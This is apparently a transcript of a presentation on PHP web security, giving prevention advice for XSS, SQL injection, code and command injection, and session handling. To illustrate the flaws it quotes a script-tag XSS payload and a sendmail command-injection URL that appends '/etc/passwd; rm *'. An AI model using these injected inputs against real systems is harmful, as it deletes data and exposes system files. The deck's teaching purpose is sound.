Php security
-
Upload
uttam-kumar -
Category
Technology
-
view
134 -
download
7
Transcript of Php security
What is Security?
measurement…
safety…
protection…
Secure Web Applications
web security issues have to do with:– hacker attacks
• denial of service
• server hijacking
– common threats– compromise of data
PHP & Security
a growing language…
a major concern…
Never trust the web…
Input data validation– register_globals = OFF– $_REQUEST[] big NO NO …– type casting input data
• No isNumeric() if data is numeric [locale problem]• regularExp if data is string
– Path validation• Always use basename()
Never trust the web…
• Content size validation– use server side max length validation
– File Upload• Check destination file size with $_FILES[‘name’][‘size’]• I think Browser MIME header is reliable right ?
– Use getImageSize() in case of image
• External source upload like Avtar– Make a local copy if path/of/file submitted from a URL.
XSS attack
– Can lead to embarrassment.– Session take-over.– Password theft.– User tracking by 3rd parties
XSS attack
Prevention is better than cure– Use striptags()
• No tag allowance please
– Use htmlentities()– Is $_SERVER safe ?
• Can be set…• Php.php/%22%3E%3Cscript%3Ealert(‘xss’)%3c/script%3E%3cfoo• $_SERVER[‘PATH_INFO’] = /”><script>alert(‘xss’)</script><foo;• $_SERVER[‘PHP_SELF’] = /php.php/”><script> alert(‘xss’)</script><foo
– IP based info• Use HTTP_X_FORWARDED_FOR• Use long2ip()
– $aIp = explode(‘,’,$_SERVER[HTTP_X_FORWARDED_FOR]);– $sValidIp = long2ip(ip2long(array_pop($ipss)));
SQL Injection
WWW
– Arbitrary query execution– Removal of data.– Modification of existing values.– Denial of service.– Arbitrary data injection.
Preventing SQL injection
• Are magic quotes enough?– use mysql_real_escape_string()– use prepared statements– avoid omitting single quotes– LIKE quandary need addslashes()– avoid printing query– Authentication data storage
• Encrypt sensitive data to access database• Make sure it’s only loaded for certain VirtualHost
Authentication Data Storage
SetEnv DB_LOGIN “login”SetEnv DB_PASSWD “password”Set Env DB_HOST “127.0.0.7”
<virtualHost iila.ws> include /home/illa/sql.conf</virtualHost>
$_SERVER[‘DB_LOGIN’]$_SERVER[‘DB_PASSWD’]
/home/illa/sql.conf Apache server configuration
PHP file
Better Approach is to set these things under php’s ini directives use php_admin_value mysql.default.user. “login”
Preventing code injection
– Path validation– Validate fileName
$sFile = “D\’sozaRes.doc’;
basename($sFile); //will return D\’sozaRes.doc on *nix systembasename($sFile); //will return ’sozaRes.doc on win32
• Remove slashes• Keep white list of file name• Use full path
– Avoid variables in eval()– Avoid using variable passed by users for regEx.
Command injection
– Use escapeshellcmd () and escapeshellarg()
– Use full path for command– Set prority and memory limit for command
• shell_exec(“ulimit –t 20 –m 20000; /usr/bin/php test.php”);
Calling External Programs
<?php $fp = popen(‘/usr/sbin/sendmail -i ‘. $to , ‘w’); ?>
The user could control $to to yield:
http://examp.com/send.php?$to=evil%40evil.org+%3C+%2Fpasswd%3B+rm+%2A
which would result in running the command:
/usr/sbin/sendmail -i [email protected] /etc/passwd; rm *
a solution would be:
$fp = popen(‘/usr/sbin/sendmail -i ‘ . escapeshellarg($to), ‘w’);
Securing sessions
• Weakness of session– Server side weakness…
• ls –l /tmp/sess_* //can reveal session info
– URL session exploitation
• Solution– Native protection.– Mixing security and convenience. – Securing session storage path– Check browser signature– Referrer validation
Questions…????
Thank You !!